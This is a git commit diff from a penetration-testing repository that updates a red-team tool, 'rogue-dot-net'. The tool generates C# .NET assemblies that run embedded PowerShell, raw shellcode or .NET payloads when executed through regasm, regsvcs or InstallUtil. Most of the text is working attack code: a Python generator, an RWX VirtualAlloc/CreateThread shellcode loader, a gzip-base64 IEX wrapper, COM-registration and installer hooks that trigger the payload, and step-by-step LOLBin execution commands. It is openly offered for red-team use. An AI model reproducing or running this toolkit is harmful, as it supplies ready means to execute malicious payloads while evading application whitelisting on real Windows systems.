Updated rogue-dot-net

This commit is contained in:
Mariusz B. / mgeeky 2020-05-05 20:22:05 +02:00
parent 1138751330
commit 72c1136fda
12 changed files with 619 additions and 444 deletions

View File

@ -316,7 +316,7 @@ $ ./markOwnedNodesInNeo4j.py kerberoasted.txt
- [**`PhishingPost`**](https://github.com/mgeeky/PhishingPost) - (PHP Script intdended to be used during Phishing campaigns as a credentials collector linked to backdoored HTML <form> action parameter. - [**`PhishingPost`**](https://github.com/mgeeky/PhishingPost) - (PHP Script intdended to be used during Phishing campaigns as a credentials collector linked to backdoored HTML <form> action parameter.
- [**`regsvcs`**](https://github.com/mgeeky/Penetration-Testing-Tools/tree/master/red-teaming/regsvcs) - Set of scripts, requirements and instructions for generating .NET Assemblies valid for **Regasm**/**Regsvcs** code execution primitives. - [**`rogue-dot-net`**](https://github.com/mgeeky/Penetration-Testing-Tools/tree/master/red-teaming/rogue-dot-net) - Set of scripts, requirements and instructions for generating .NET Assemblies valid for **Regasm**/**Regsvcs**/**InstallUtil** code execution primitives.
- [**`RobustPentestMacro`**](https://github.com/mgeeky/RobustPentestMacro) - This is a rich-featured Visual Basic macro code for use during Penetration Testing assignments, implementing various advanced post-exploitation techniques. - [**`RobustPentestMacro`**](https://github.com/mgeeky/RobustPentestMacro) - This is a rich-featured Visual Basic macro code for use during Penetration Testing assignments, implementing various advanced post-exploitation techniques.

View File

@ -1,78 +0,0 @@
## Rogue .NET Assembly for Regsvcs/Regasm Code Execution
Follow below described steps to properly generate your source code and then compile it to a .NET Assembly valid for Regasm/Regsvcs:
### Step 1: Generate key.snk file
```
powershell -file build.ps1
```
### Step 2: Generate source code file
Included in this directory script is a helper utility allowing one to quickly generate desired csharp source code file to be used for further `csc` compilation.
Usage:
```
python3 generateRegsvcs.py --help
:: Regsvcs Code Execution Source code generation utility
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm.
Mariusz B. / mgeeky, <mb@binary-offensive.com>
usage: .\generateRegsvcs.py [options] <inputFile>
positional arguments:
inputFile Input file to be embeded within C# code. May be either Powershell script, raw binary Shellcode or .NET Assembly (PE/EXE) file.
optional arguments:
-h, --help show this help message and exit
-e, --exe Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE!
-r, --raw Specified input file is a raw Shellcode to be injected in self process in a separate Thread.
```
Sample use case:
```
python3 generateRegsvcs.py -r notepad64.bin > program.cs
:: Regsvcs Code Execution Source code generation utility
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm.
Mariusz B. / mgeeky, <mb@binary-offensive.com>
[?] File specified as raw Shellcode.
```
### Step 3: Compilate library .NET Assembly
```
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs
```
If you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script). Then proper compilation command will be:
```
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs
```
### Step 4: Code execution via Regsvcs or Regasm:
```
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll
```
or
```
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe regsvcs.dll
```
or
```
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U regsvcs.dll
```
or
```
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U regsvcs.dll
```

Binary file not shown.

View File

@ -0,0 +1,90 @@
## Rogue .NET Assembly for Regsvcs/Regasm/InstallUtil Code Execution
Follow below described steps to properly generate your source code and then compile it into a nice rogue .NET Assembly ready to be executed by:
- [Regasm](https://lolbas-project.github.io/lolbas/Binaries/Regasm/)
- [Regsvcs](https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/)
- [InstallUtil](https://lolbas-project.github.io/lolbas/Binaries/Installutil/)
### Step 1: Generate key.snk file
```
powershell -file build.ps1
```
### Step 2: Generate source code file
Included in this directory script is a helper utility allowing one to quickly generate desired csharp source code file to be used for further `csc` compilation.
Usage:
```
python3 generateRogueDotNet.py --help
:: Rogue .NET Source Code Generation Utility
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil.
Mariusz B. / mgeeky, <mb@binary-offensive.com>
usage: .\generateRogueDotNet.py [options] <inputFile>
positional arguments:
inputFile Input file to be embeded within C# code. May be either Powershell script, raw binary Shellcode or .NET Assembly (PE/EXE) file.
optional arguments:
-h, --help show this help message and exit
-e, --exe Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE!
-r, --raw Specified input file is a raw Shellcode to be injected in self process in a separate Thread.
```
Sample use case:
```
python3 generateRogueDotNet.py -r notepad64.bin > program.cs
:: Rogue .NET Source Code Generation Utility
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil.
Mariusz B. / mgeeky, <mb@binary-offensive.com>
[?] File specified as raw Shellcode.
```
### Step 3: Compilate library .NET Assembly
```
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
```
If you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script). Then proper compilation command will be:
```
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
```
### Step 4: Code execution via Regsvcs, Regasm or InstallUtil:
- x86:
```
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe rogue.dll
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U rogue.dll
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe rogue.dll
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U rogue.dll
%WINDIR%\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
%WINDIR%\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
```
- x64:
```
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe rogue.dll
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U rogue.dll
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe rogue.dll
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe /U rogue.dll
%WINDIR%\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
```

View File

@ -1,5 +1,5 @@
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4=' $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
$Content = [System.Convert]::FromBase64String($key) $Content = [System.Convert]::FromBase64String($key)
Set-Content key.snk -Value $Content -Encoding Byte Set-Content key.snk -Value $Content -Encoding Byte
& "$env:Windir\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs & "$env:Windir\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs

View File

@ -1,360 +1,382 @@
#!/usr/bin/python3 #!/usr/bin/python3
# #
# Red-Teaming script that constructs C# code for Regsvcs code execution technique. # Red-Teaming script that constructs C# code for Regsvcs/Regasm/InstallUtil code execution technique.
# #
# Step 1: Generate source code file # Step 1: Generate source code file
# cmd> python3 generateRegsvcs.py -r payload.bin > program.cs # cmd> python3 generateRogueDotNet.py -r payload.bin > program.cs
# #
# Step 2: Compilate library .NET Assembly # Step 2: Compilate library .NET Assembly
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs # cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
# #
# if you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used # if you passed Powershell code to be launched in a .NET Runspace, then an additional assembly will have to be used
# to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script). # to compile resulting source code properly - meaning System.Management.Automation.dll (provided with this script).
# Then proper compilation command will be: # Then proper compilation command will be:
# #
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs # cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.Management.Automation.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
# #
# # Step 3: Code execution via Regsvcs, Regasm or InstallUtil:
# Step 3: Code execution via Regsvcs or Regasm: # x86:
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll # cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe rogue.dll
# or # cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe rogue.dll
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe regsvcs.dll
# or # cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U rogue.dll
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U regsvcs.dll # cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U rogue.dll
# or
# cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U regsvcs.dll # cmd> %WINDIR%\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
# # cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
# Mariusz B. / mgeeky, <mb@binary-offensive.com> # x64:
# # cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe rogue.dll
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe rogue.dll
import re
import os # cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe /U rogue.dll
import io # cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U rogue.dll
import sys
import gzip # cmd> %WINDIR%\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
import base64 # cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
import string #
import struct # Mariusz B. / mgeeky, <mb@binary-offensive.com>
import random #
import binascii
import argparse import re
import os
import io
def getCompressedPayload(filePath): import sys
out = io.BytesIO() import gzip
encoded = '' import base64
with open(filePath, 'rb') as f: import string
inp = f.read() import struct
import random
with gzip.GzipFile(fileobj = out, mode = 'w') as fo: import binascii
fo.write(inp) import argparse
encoded = base64.b64encode(out.getvalue())
def getCompressedPayload(filePath):
powershell = "$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('{}')); IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();".format( out = io.BytesIO()
encoded.decode() encoded = ''
) with open(filePath, 'rb') as f:
return powershell inp = f.read()
def getSourceFileContents(payload, _format): with gzip.GzipFile(fileobj = out, mode = 'w') as fo:
launchCode = '' fo.write(inp)
usings = ''
encoded = base64.b64encode(out.getvalue())
if _format == 'exe':
powershell = "$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('{}')); IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();".format(
exeLaunchCode = string.Template(''' encoded.decode()
public static void Execute() { )
return powershell
string payload = "$payload2";
byte[] decoded = System.Convert.FromBase64String(payload); def getSourceFileContents(payload, _format):
launchCode = ''
Assembly asm = Assembly.Load(decoded); usings = ''
MethodInfo method = asm.EntryPoint;
object instance = asm.CreateInstance(method.Name); if _format == 'exe':
method.Invoke(instance, null);
exeLaunchCode = string.Template('''
}''').safe_substitute( public static void Execute() {
payload2 = base64.b64encode(payload.encode()).decode()
) string payload = "$payload2";
byte[] decoded = System.Convert.FromBase64String(payload);
launchCode = exeLaunchCode Assembly asm = Assembly.Load(decoded);
MethodInfo method = asm.EntryPoint;
elif _format == 'raw': object instance = asm.CreateInstance(method.Name);
method.Invoke(instance, null);
foo = str(binascii.hexlify(payload), 'ascii')
fooarr = ['0x{}'.format(foo[i:i+2]) for i in range(0, len(foo), 2)] }''').safe_substitute(
encodedPayload = ' ' payload2 = base64.b64encode(payload.encode()).decode()
)
for i in range(len(fooarr)):
if i % 16 == 0 and i > 0:
encodedPayload += '\n ' launchCode = exeLaunchCode
encodedPayload += '{}, '.format(fooarr[i])
elif _format == 'raw':
encodedPayload = encodedPayload.strip()[:-1]
foo = str(binascii.hexlify(payload), 'ascii')
shellcodeLoader = string.Template(''' fooarr = ['0x{}'.format(foo[i:i+2]) for i in range(0, len(foo), 2)]
[DllImport("kernel32")] encodedPayload = ' '
private static extern IntPtr VirtualAlloc(
IntPtr lpAddress, UIntPtr dwSize, for i in range(len(fooarr)):
UInt32 flAllocationType, if i % 16 == 0 and i > 0:
UInt32 flProtect encodedPayload += '\n '
); encodedPayload += '{}, '.format(fooarr[i])
[DllImport("kernel32")] encodedPayload = encodedPayload.strip()[:-1]
private static extern bool VirtualFree(
IntPtr lpAddress, shellcodeLoader = string.Template('''
UInt32 dwSize, [DllImport("kernel32")]
UInt32 dwFreeType private static extern IntPtr VirtualAlloc(
); IntPtr lpAddress, UIntPtr dwSize,
UInt32 flAllocationType,
[DllImport("kernel32")] UInt32 flProtect
private static extern IntPtr CreateThread( );
UInt32 lpThreadAttributes,
UInt32 dwStackSize, [DllImport("kernel32")]
IntPtr lpStartAddress, private static extern bool VirtualFree(
IntPtr param, IntPtr lpAddress,
UInt32 dwCreationFlags, UInt32 dwSize,
ref UInt32 lpThreadId UInt32 dwFreeType
); );
[DllImport("kernel32")] [DllImport("kernel32")]
private static extern bool CloseHandle( private static extern IntPtr CreateThread(
IntPtr hHandle UInt32 lpThreadAttributes,
); UInt32 dwStackSize,
IntPtr lpStartAddress,
[DllImport("kernel32")] IntPtr param,
private static extern UInt32 WaitForSingleObject( UInt32 dwCreationFlags,
IntPtr hHandle, ref UInt32 lpThreadId
UInt32 dwMilliseconds );
);
[DllImport("kernel32")]
private static UInt32 MEM_COMMIT = 0x1000; private static extern bool CloseHandle(
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; IntPtr hHandle
private static UInt32 MEM_RELEASE = 0x8000; );
public static void Execute() { [DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject(
byte[] payload = new byte[$payloadSize] { IntPtr hHandle,
$payload2 UInt32 dwMilliseconds
}; );
IntPtr funcAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)payload.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); private static UInt32 MEM_COMMIT = 0x1000;
Marshal.Copy(payload, 0, funcAddr, payload.Length); private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
IntPtr hThread = IntPtr.Zero; private static UInt32 MEM_RELEASE = 0x8000;
UInt32 threadId = 0;
public static void Execute() {
hThread = CreateThread(0, 0, funcAddr, IntPtr.Zero, 0, ref threadId);
WaitForSingleObject(hThread, 0xFFFFFFFF); byte[] payload = new byte[$payloadSize] {
$payload2
CloseHandle(hThread); };
VirtualFree(funcAddr, 0, MEM_RELEASE);
IntPtr funcAddr = VirtualAlloc(IntPtr.Zero, (UIntPtr)payload.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
}''').safe_substitute( Marshal.Copy(payload, 0, funcAddr, payload.Length);
payload2 = encodedPayload, IntPtr hThread = IntPtr.Zero;
payloadSize = len(payload) UInt32 threadId = 0;
)
hThread = CreateThread(0, 0, funcAddr, IntPtr.Zero, 0, ref threadId);
launchCode = shellcodeLoader WaitForSingleObject(hThread, 0xFFFFFFFF);
else: CloseHandle(hThread);
usings += ''' VirtualFree(funcAddr, 0, MEM_RELEASE);
using System.Management.Automation;
using System.Management.Automation.Runspaces; }''').safe_substitute(
''' payload2 = encodedPayload,
powershellLaunchCode = string.Template(''' payloadSize = len(payload)
public static void Execute() { )
byte[] payload = System.Convert.FromBase64String("$payload2"); launchCode = shellcodeLoader
string decoded = System.Text.Encoding.UTF8.GetString(payload);
else:
Runspace runspace = RunspaceFactory.CreateRunspace(); usings += '''
runspace.Open(); using System.Management.Automation;
using System.Management.Automation.Runspaces;
Pipeline pipeline = runspace.CreatePipeline(); '''
pipeline.Commands.AddScript(decoded); powershellLaunchCode = string.Template('''
pipeline.Invoke(); public static void Execute() {
runspace.Close(); byte[] payload = System.Convert.FromBase64String("$payload2");
}''').safe_substitute( string decoded = System.Text.Encoding.UTF8.GetString(payload);
payload2 = base64.b64encode(payload.encode()).decode()
) Runspace runspace = RunspaceFactory.CreateRunspace();
runspace.Open();
launchCode = powershellLaunchCode
Pipeline pipeline = runspace.CreatePipeline();
pipeline.Commands.AddScript(decoded);
template = string.Template(''' pipeline.Invoke();
using System;
using System.Diagnostics; runspace.Close();
using System.Reflection; }''').safe_substitute(
using System.Runtime.InteropServices; payload2 = base64.b64encode(payload.encode()).decode()
using System.EnterpriseServices; )
$usings
launchCode = powershellLaunchCode
/*
Author: Casey Smith, Twitter: @subTee
Customized by: Mariusz B. / mgeeky, <mb@binary-offensive.com> template = string.Template('''
License: BSD 3-Clause using System;
using System.Diagnostics;
Step 1: Create Your Strong Name Key -> key.snk using System.Reflection;
using System.Runtime.InteropServices;
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4=' using System.EnterpriseServices;
$Content = [System.Convert]::FromBase64String($key) $usings
Set-Content key.snk -Value $Content -Encoding Byte
/*
Step 2: Compile source code: Author: Casey Smith, Twitter: @subTee
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk program.cs Customized by: Mariusz B. / mgeeky, <mb@binary-offensive.com>
License: BSD 3-Clause
Step 3: Execute your payload!
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe regsvcs.dll Step 1: Create Your Strong Name Key -> key.snk
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe regsvcs.dll
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U regsvcs.dll $key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U regsvcs.dll $Content = [System.Convert]::FromBase64String($key)
*/ Set-Content key.snk -Value $Content -Encoding Byte
namespace Program Step 2: Compile source code:
{ C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /r:System.EnterpriseServices.dll /target:library /out:rogue.dll /keyfile:key.snk program.cs
public class Bypass : ServicedComponent
{ Step 3: Execute your payload!
public Bypass() C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe rogue.dll
{ C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe rogue.dll
} C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regsvcs.exe /U rogue.dll
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U rogue.dll
// This executes if registration is successful */
[ComRegisterFunction]
public static void RegisterClass( string key ) namespace Program
{ {
Shellcode.Execute(); public class Bypass : ServicedComponent
} {
public Bypass()
// This executes if registration fails {
[ComUnregisterFunction] }
public static void UnRegisterClass( string key )
{ // This executes if registration is successful
Shellcode.Execute(); [ComRegisterFunction]
} public static void RegisterClass( string key )
} {
Shellcode.Execute();
public class Shellcode }
{
$launchCode // This executes if registration fails
} [ComUnregisterFunction]
}''').safe_substitute( public static void UnRegisterClass( string key )
launchCode = launchCode, {
usings = usings Shellcode.Execute();
) }
}
return template
[System.ComponentModel.RunInstaller(true)]
def detectFileIsExe(filePath, forced = False): public class ForInstallUtil : System.Configuration.Install.Installer
first1000 = [] {
// This executes during InstallUtil /U invocation
with open(filePath, 'rb') as f: public override void Uninstall(System.Collections.IDictionary savedState)
first1000 = f.read()[:1000] {
Shellcode.Execute();
if not (first1000[0] == 'M' and first1000[1] == 'Z'): }
return False }
elfanew = struct.unpack('<H', first1000[0x3c:0x3c + 2])[0] public class Shellcode
{
if not (first1000[elfanew + 0] == 'P' and first1000[elfanew + 1] == 'E'): $launchCode
return False }
}''').safe_substitute(
dosStub = "This program cannot be run in DOS mode." launchCode = launchCode,
printables = ''.join([x for x in first1000[0x40:] if x in string.printable]) usings = usings
)
#if not dosStub in printables:
# return False return template
return True
def detectFileIsExe(filePath, forced = False):
first1000 = []
def opts(argv):
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <inputFile>') with open(filePath, 'rb') as f:
parser.add_argument('inputFile', help = 'Input file to be embeded within C# code. May be either Powershell script, raw binary Shellcode or .NET Assembly (PE/EXE) file.') first1000 = f.read()[:1000]
parser.add_argument('-e', '--exe', action='store_true', help = 'Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE!')
parser.add_argument('-r', '--raw', action='store_true', help = 'Specified input file is a raw Shellcode to be injected in self process in a separate Thread.') if not (first1000[0] == 'M' and first1000[1] == 'Z'):
return False
args = parser.parse_args()
elfanew = struct.unpack('<H', first1000[0x3c:0x3c + 2])[0]
if args.exe and args.raw:
sys.stderr.write('[!] --exe and --raw options are mutually exclusive!\n') if not (first1000[elfanew + 0] == 'P' and first1000[elfanew + 1] == 'E'):
sys.exit(-1) return False
return args dosStub = "This program cannot be run in DOS mode."
printables = ''.join([x for x in first1000[0x40:] if x in string.printable])
def main(argv):
sys.stderr.write(''' #if not dosStub in printables:
:: Regsvcs Code Execution Source code generation utility # return False
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm. return True
Mariusz B. / mgeeky, <mb@binary-offensive.com>
''') def opts(argv):
if len(argv) < 2: parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <inputFile>')
print('Usage: ./generateRegsvcs.py <inputFile>') parser.add_argument('inputFile', help = 'Input file to be embeded within C# code. May be either Powershell script, raw binary Shellcode or .NET Assembly (PE/EXE) file.')
sys.exit(-1) parser.add_argument('-e', '--exe', action='store_true', help = 'Specified input file is an Mono/.Net assembly PE/EXE. WARNING: Launching EXE is currently possible ONLY WITH MONO/.NET assembly EXE/DLL files, not an ordinary native PE/EXE!')
parser.add_argument('-r', '--raw', action='store_true', help = 'Specified input file is a raw Shellcode to be injected in self process in a separate Thread.')
args = opts(argv)
args = parser.parse_args()
_format = 'powershell'
if args.exe and args.raw:
if args.exe: sys.stderr.write('[!] --exe and --raw options are mutually exclusive!\n')
if not detectFileIsExe(args.inputFile, args.exe): sys.exit(-1)
sys.stderr.write('[?] File not recognized as PE/EXE.\n\n')
return False return args
_format = 'exe' def main(argv):
